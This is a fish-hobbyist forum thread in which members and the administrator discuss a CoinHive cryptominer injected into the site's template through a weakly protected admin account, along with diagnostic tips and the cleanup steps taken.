Arofanatics Fish Talk Forums  

Go Back   Arofanatics Fish Talk Forums > The Guildhouse > Chatterbox

Reply
 
Thread Tools Display Modes
Old 13-12-2017, 06:36 PM   #21
DragonFireSG
Arofanatic
 
Join Date: Jul 2015
Posts: 312
Default

I am free tech support for family and friends T_T

try a netstat -a -o | grep coinhive to see the process ID.

Should be able to find the responsible process and kill it, or at least track down what is running the miner.

I actually caught on to this only after my network monitoring tools reported my own PC as a source of bitcoin mining traffic.

That said, you are definitely no stranger to computers if you have grep installed on your windows machine!
DragonFireSG is offline   Reply With Quote
Old 13-12-2017, 06:38 PM   #22
DragonFireSG
Arofanatic
 
Join Date: Jul 2015
Posts: 312
Default

Quote:
Originally Posted by Alvin Koh View Post
Guys, I found the injected code and removed it.

The warnings should not appear anymore.
I will continue to investigate the cause.
I would consider the server compromised...

Probably a good time to change all passwords and rebuild the system if you can. If this was a hack - and it likely is one - who knows what other back doors have been inserted.
DragonFireSG is offline   Reply With Quote
Old 13-12-2017, 09:21 PM   #23
satan_gal
Dragon
 
satan_gal's Avatar
 
Join Date: Apr 2006
Posts: 1,714
Default

huat ar

ok le

My IT shd stop sendin me emails to warn me liao...
satan_gal is offline   Reply With Quote
Old 14-12-2017, 01:49 AM   #24
Alvin Koh

Administrator

 
Alvin Koh's Avatar
 
Join Date: Sep 2000
Posts: 1,421
Default

The CoinHive injection happened on the 8th Dec from examining the web server logs. The perpetrator modified an empty section of the forum template with the Coinhive miner codes via the forum admin control panel leaving a trail in the logs.

I believe the fault is mine as a weak/old password was used for my main forum account which I haven't been actively using. Other than the administration control panel, I do not see signs of forced entry via other means (shell/Database w/ differing password and credentials).

To prevent a repeat, I've changed the method of access to the Admin controls and also added an additional layer of authentication to only those who have rights.

Sorry for the trouble everyone and thanks to those who reported it.

I will re-enable the Chatroom as it was not the cause afterall.
Alvin Koh is offline   Reply With Quote
Old 14-12-2017, 03:19 AM   #25
NI KI
Arofanatic
 
Join Date: Oct 2006
Posts: 168
Default

I cant attached photo in chatter box. is it the cause of the "coinhive.com"?
NI KI is offline   Reply With Quote
Old 14-12-2017, 08:10 AM   #26
richardg
Arofanatic
 
richardg's Avatar
 
Join Date: Oct 2005
Posts: 120
Default

Quote:
Originally Posted by DragonFireSG View Post
I am free tech support for family and friends T_T

try a netstat -a -o | grep coinhive to see the process ID.

Should be able to find the responsible process and kill it, or at least track down what is running the miner.

I actually caught on to this only after my network monitoring tools reported my own PC as a source of bitcoin mining traffic.

That said, you are definitely no stranger to computers if you have grep installed on your windows machine!
the network connection is established every time teamviewer is started
the other PID belongs to killerserver.exe
Uninstalled and reinstalled Teamview but it still returns.
it seems i can trap the connection to within localhost but cant get rid of the virus, where is it hiding?
Avast and Malwarebytes freeware cant detect it
richardg is offline   Reply With Quote
Old 14-12-2017, 10:02 AM   #27
Ong88

Prof SK Ong
 
Ong88's Avatar
 
Join Date: Jan 2009
Posts: 10,641
Default

Wah

My orpit no IT department but also can block AF.
Can't use wifi.

Lucky got mobile data.
__________________



Just because it's a bad idea doesn't mean it won't be a good time.
Use imgur for your photos sharing
https://play.google.com/store/apps/d...m.imgur.mobile
Ong88 is offline   Reply With Quote
Old 14-12-2017, 10:39 AM   #28
richardg
Arofanatic
 
richardg's Avatar
 
Join Date: Oct 2005
Posts: 120
Default

Quote:
Originally Posted by richardg View Post
the network connection is established every time teamviewer is started
the other PID belongs to killerserver.exe
Uninstalled and reinstalled Teamview but it still returns.
it seems i can trap the connection to within localhost but cant get rid of the virus, where is it hiding?
Avast and Malwarebytes freeware cant detect it
pls ignore
shld be false alarm
richardg is offline   Reply With Quote
Old 14-12-2017, 11:53 AM   #29
satan_gal
Dragon
 
satan_gal's Avatar
 
Join Date: Apr 2006
Posts: 1,714
Default

Quote:
Originally Posted by NI KI View Post
I cant attached photo in chatter box. is it the cause of the "coinhive.com"?


wad u mean?
satan_gal is offline   Reply With Quote
Old 16-12-2017, 04:49 AM   #30
NI KI
Arofanatic
 
Join Date: Oct 2006
Posts: 168
Default

having problem posting picture with IE but not Firefox
NI KI is offline   Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT +9. The time now is 03:34 PM.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Copyright © 2000-2008 Arofanatics.com (Since 30th August 2000)